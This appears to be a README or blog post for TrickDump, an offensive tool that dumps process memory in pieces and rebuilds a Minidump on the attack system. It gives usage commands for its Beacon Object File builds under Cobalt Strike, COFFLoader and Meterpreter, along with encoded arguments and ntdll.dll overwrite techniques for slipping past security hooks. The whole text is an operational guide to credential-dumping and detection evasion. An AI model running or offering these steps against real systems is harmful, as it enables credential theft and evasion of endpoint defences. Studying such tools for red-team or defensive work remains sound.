Updating TrickDump and creating a BOF File.

Trickdump - “bof-flavour” branch

This branch implements the same functionality as the main branch but using BOFs (Beacon Object Files).

You can execute the files using Cobalt Strike, TrustedSec’s COFFLoader or Meterpreter’s bofloader module.

Cobalt Strike

First import the aggressor scripts:

Each BOF file has one optional input argument for overwriting ntdll.dll:

• “disk”: Using a DLL already on disk. The default path is “C:\Windows\System32\ntdll.dll”.
• “knowndlls”: Using the KnownDlls folder.
• “debugproc”: Using a process created in debug mode. The default process is “c:\windows\system32\calc.exe”.

lock <OVERWRITE_TECHNIQUE>

shock <OVERWRITE_TECHNIQUE>

barrel <OVERWRITE_TECHNIQUE>

If you prefer to generate all the files at the same time, run the Trick BOF:

trick <OVERWRITE_TECHNIQUE>

Finally generate the Minidump file:

python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE]

COFFLoader

COFFLoader64.exe go <BOF_FILE> <OVERWRITE_TECHNIQUE>

The argument to overwrite the ntdll library must be generated using COFFLoader’s beacon_generate.py script:

• “disk”: Use the value 09000000050000006469736b00
• “knowndlls”: Use the value 0e0000000a0000006b6e6f776e646c6c7300
• “debugproc”: Use the value 0e0000000a000000646562756770726f6300

Examples running each BOF file with a differente overwrite technique:

COFFLoader64.exe go lock_bof.o 09000000050000006469736b00

COFFLoader64.exe go shock_bof.o 0e0000000a0000006b6e6f776e646c6c7300

COFFLoader64.exe go barrel_bof.o 0e0000000a000000646562756770726f6300

If you prefer to generate all the files at the same time, run the Trick BOF:

COFFLoader64.exe go trick_bof.o <OVERWRITE_TECHNIQUE>

Meterpreter’s bofloader module

You can run the BOF files in your Meterpreter session after loading the “bofloader” module and using “–format-string z " to use a ntdll overwrite technique:

load bofloader
execute_bof lock_bof.o --format-string z <OVERWRITE_TECHNIQUE>
execute_bof shock_bof.o --format-string z <OVERWRITE_TECHNIQUE>
execute_bof barrel_bof.o --format-string z <OVERWRITE_TECHNIQUE>

If you prefer to generate all the files at the same time, run the Trick BOF:

execute_bof trick_bof.o --format-string z <OVERWRITE_TECHNIQUE>

TrickDump - “c-flavour” branch

This branch implements the same functionality as the main branch but using C/C++:

Lock.exe [disk/knowndlls/debugproc]

Shock.exe [disk/knowndlls/debugproc]

Barrel.exe [disk/knowndlls/debugproc]

You can execute the programs directly without overwriting the ntdll.dll library:

Or use one of the three different overwrite techniques (“disk”, “knowndlls” or “debugproc”):

Then use the create_dump.py script to generate the Minidump file in the attack system:

python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE]

All in one

If you prefer to execute only one binary, Trick.exe generates a ZIP file containing the 3 JSON files and the ZIP file with the memory regions:

Trick.exe [disk/knowndlls/debugproc]

It creates the ZIP file locally, optionally using a ntdll.dll overwrite method:

With a ZIP file like this, unzip it and create the Minidump file using create_dump.py: